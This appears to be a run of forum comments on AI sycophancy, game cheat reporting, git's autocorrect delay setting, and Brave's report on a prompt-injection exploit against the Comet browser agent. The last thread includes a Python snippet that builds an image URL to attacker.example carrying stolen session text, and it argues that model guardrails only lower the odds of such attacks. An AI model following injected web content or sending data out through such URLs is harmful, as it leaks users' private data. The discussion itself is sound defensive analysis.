Edit: just realized the irony but it's really a good question lol
Never forget what AI stole from us. This used to be a compliment, a genuine appreciation of a good question well-asked. Now it's tainted with the slimy, servile, sycophantic stink of AI chat models.
If it's a server with admins, I can contact the admins on Discord and get cheaters banned pretty quickly. As a system it worked pretty well; there were some badmins, but there were plenty of servers so you could just join another. Though it's not really compatible with the matchmaking-style games we have today.
1. How many active Apex/whatever games there are at any one time
2. How many users will just report anyone they die to as a cheater
That being said, there are obviously cases where you mistype (usually a fat-finger, where you don't physically register that you've pressed multiple keys) and don't realise it until you see it on screen or the application doesn't do what you expected. 100ms is obviously not enough time to react to an unexpected stimulus like that.
EDIT: 1) is the result of my misreading of the article; the "previous value" never existed in git.
1) Pushing a change that silently breaks existing setups by reinterpreting a previous configuration value (1 = true) as a different value (1 = a 0.1s, i.e. 100ms, confirmation delay) should pretty much always be avoided. Obviously you'd want to clear old values if they existed (maybe this did happen? it's unclear to me), but you also probably want to rename the configuration key.
2) Having `help.autocorrect`'s configuration argument be a time, measured in deciseconds, a unit most users never work in, is just plainly bad. Give me a boolean to enable it, and a decimal (in seconds) to control the confirmation time.
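For reference, here's a minimal sketch of the semantics being complained about, based on git's documented behaviour (a positive value is a delay in deciseconds before the guessed command runs); the helper name is mine, not git's:

```python
# Rough sketch of how a positive help.autocorrect value is interpreted
# (per git's docs: the number is a delay in deciseconds, i.e. tenths of a second).
def autocorrect_delay_seconds(value: int) -> float | None:
    """Return the auto-run delay in seconds, or None if autocorrect only suggests."""
    if value == 0:
        return None      # 0 / "false": show the suggestion, never auto-run
    return value / 10.0  # positive N: run the guessed command after N/10 seconds

print(autocorrect_delay_seconds(1))   # 0.1 -> the surprising 100 ms window
print(autocorrect_delay_seconds(30))  # 3.0 -> a delay a human can actually react to
```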
An LLM within a browser that can view data across tabs is the ultimate “lethal trifecta”.
Earlier discussion: https://news.ycombinator.com/item?id=44847933
It’s interesting that in Brave’s post describing this exploit, they didn’t reach the fundamental conclusion that this is a bad idea: https://brave.com/blog/comet-prompt-injection/
Instead they believe model alignment, trying to understand when a user is doing a dangerous task, etc., will be enough. The only good mitigation they mention is that the agent should drop privileges, but it’s just as easy to hit an attacker-controlled image URL to leak data as it is to send an email.
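To make the image-URL channel concrete, here's a minimal sketch (attacker.example and the helper are hypothetical): injected instructions only need the agent to "load an image" whose URL encodes whatever the agent can read from the page.

```python
from urllib.parse import quote

# Sketch of the exfiltration channel: the GET request for the "image"
# carries the stolen text to the attacker's server as a query parameter.
def exfil_image_markdown(stolen_text: str) -> str:
    return f"![loading](https://attacker.example/pixel.png?d={quote(stolen_text)})"

# No email-sending privilege required; fetching the image is the leak.
print(exfil_image_markdown("session=abc123; inbox summary..."))
```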
Maybe I have a fundamental misunderstanding, but model alignment and in-model guardrails are statistical preventions, i.e. you're reducing the odds to some number of zeroes preceding the 1. These things should literally never be able to happen, though. It's a fool's errand to hope that you'll get to a model where there is no value in the input space that maps to <bad thing you really don't want>. Even if you "stack" models, having a safety-check model act on the output of your larger model, you're still just multiplying odds.
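A toy way to see the point (made-up failure rates, not measurements): if each guardrail independently misses some small fraction of adversarial inputs, stacking them multiplies those fractions, which improves the odds but never reaches zero.

```python
# Toy illustration with invented numbers: stacked, independent safety filters
# multiply their miss rates; the product is still a nonzero chance of <bad thing>.
def combined_miss_rate(miss_rates: list[float]) -> float:
    """Probability that every filter in the stack misses the same attack."""
    p = 1.0
    for r in miss_rates:
        p *= r
    return p

# e.g. a guardrailed model that misses 1 in 10,000 attacks,
# plus a safety-check model that misses 1 in 1,000:
print(combined_miss_rate([1e-4, 1e-3]))  # 1e-07 -- more zeroes, still not "never"
```

And that multiplication assumes the failures are independent, which is optimistic: the same injection that fools the main model is often exactly the kind of input that fools the safety-check model too.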